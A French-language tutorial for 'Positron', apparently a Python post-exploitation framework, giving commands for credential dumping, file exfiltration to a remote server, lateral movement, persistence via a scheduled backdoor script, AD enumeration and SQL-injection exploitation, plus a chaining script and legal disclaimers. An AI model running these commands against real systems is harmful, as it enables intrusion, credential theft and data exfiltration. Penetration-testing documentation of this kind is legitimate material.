⚛️ Positron - Guide Exhaustif
Positron est un framework de post-exploitation écrit en Python, conçu pour automatiser les tâches d'exploitation, d'analyse et d'exfiltration dans des environnements sécurisés. Ce guide couvre chaque étape, des bases aux fonctionnalités avancées. 🚀
1️⃣ Pré-requis
- Une distribution Linux (Kali, Ubuntu, ou équivalente).
- Python 3.8 ou supérieur.
- Git pour cloner le projet.
- Accès à une cible via des identifiants valides ou une session pré-compromise.
- Connaissance des techniques de post-exploitation.
2️⃣ Installation de Positron
Étape 1 : Télécharger Positron
Clonez le dépôt GitHub officiel :
git clone https://github.com/PositronFramework/positron.git
Accédez au répertoire :
cd positron
Étape 2 : Installer les Dépendances
Installez les bibliothèques nécessaires :
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install -r requirements.txt
Étape 3 : Tester l’Outil
Assurez-vous que Positron est fonctionnel :
python3 positron.py --help
Vous devriez voir une liste des commandes disponibles.
3️⃣ Configuration de Positron
Connexion à une Cible
Positron peut se connecter à une cible via SSH, RDP, ou une session déjà compromise :
python3 positron.py --target --user --password
Configuration des Modules
Personnalisez les modules actifs dans le fichier de configuration :
config/positron_modules.json
Exemple de module activé :
{
"module": "network_scan",
"enabled": true,
"options": {
"range": "192.168.1.0/24",
"output": "/results/network_scan.json"
}
}
4️⃣ Fonctionnalités de Base
Analyse Réseau
Scannez les ports ouverts sur le réseau local :
python3 positron.py --module network_scan --range 192.168.1.0/24
Exfiltration de Fichiers
Récupérez des fichiers sensibles depuis la cible :
python3 positron.py --module file_exfil --target "C:\Users\Public\Documents"
Dump de Mots de Passe
Utilisez un module intégré pour extraire les mots de passe :
python3 positron.py --module creds_dump
5️⃣ Fonctionnalités Avancées
Déplacement Latéral
Pivotez vers une autre machine sur le réseau :
python3 positron.py --module lateral_movement --target --user --password
Reconnaissance Active Directory
Cartographiez les relations dans un environnement AD :
python3 positron.py --module ad_enum
Persistance
Ajoutez une tâche planifiée pour exécuter un script malveillant au démarrage :
python3 positron.py --module persistence --script backdoor.ps1
6️⃣ Scénarios Pratiques
Scénario 1 : Analyse Réseau et Découverte de Services
Identifiez les machines actives et les services exposés :
python3 positron.py --module network_scan --range 10.0.0.0/16
Scénario 2 : Dump des Credentials
Récupérez les credentials locaux et distants :
python3 positron.py --module creds_dump
Scénario 3 : Exfiltration Discrète
Utilisez une technique furtive pour envoyer les fichiers collectés vers un serveur distant :
python3 positron.py --module file_exfil --target "C:\Users\Admin\Documents" --upload
Scénario 4 : Exploitation d'une Application Web
Utilisez le module web_exploit pour détecter et exploiter une faille :
python3 positron.py --module web_exploit --url "http://cible.com" --payload "sql_injection"
7️⃣ Automatisation et Intégration
Automatisation des Tâches
Créez un script pour exécuter plusieurs modules en chaîne :
#!/bin/bash
python3 positron.py --module network_scan --range 192.168.1.0/24
python3 positron.py --module creds_dump
python3 positron.py --module file_exfil --target "C:\sensitive_files"
Intégration avec Splunk
Envoyez les logs générés par Positron à Splunk pour une analyse avancée :
splunk add monitor /path/to/positron_logs --sourcetype positron
8️⃣ Conseils et Bonnes Pratiques
- Utilisez uniquement dans des environnements autorisés.
- Documentez toutes les actions pour respecter les engagements éthiques.
- Testez les modules dans un environnement simulé avant une utilisation réelle.
- Activez les journaux pour surveiller les activités exécutées par Positron.
- Vérifiez les configurations réseau avant chaque utilisation pour éviter des erreurs.
9️⃣ Rappels Légaux et Éthiques
⚠️ Avertissement : Positron est un outil réservé aux tests légaux et autorisés. Toute utilisation abusive est strictement interdite.